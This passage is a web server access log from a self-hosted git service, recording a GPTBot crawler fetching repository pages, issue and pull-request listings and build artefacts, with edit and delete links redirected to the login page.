"/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:45:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11287] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:19:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=source" [Client 74.7.227.38] [Length 12008] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:19:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26372] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26345] [Gzip 11.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?state=closed&type=all" [Client 74.7.227.38] [Length 10125] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:19:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:19:45:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:45:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11143] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:19:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11370] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=source" [Client 74.7.227.38] [Length 14066] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=rendered" [Client 74.7.227.38] [Length 10989] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=source" [Client 74.7.227.38] [Length 13778] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=source" [Client 74.7.227.38] [Length 14066] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:45:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:45:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:19:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9861] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:19:45:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:19:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:19:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:19:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:19:45:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:19:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:19:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.56] [Sent-to 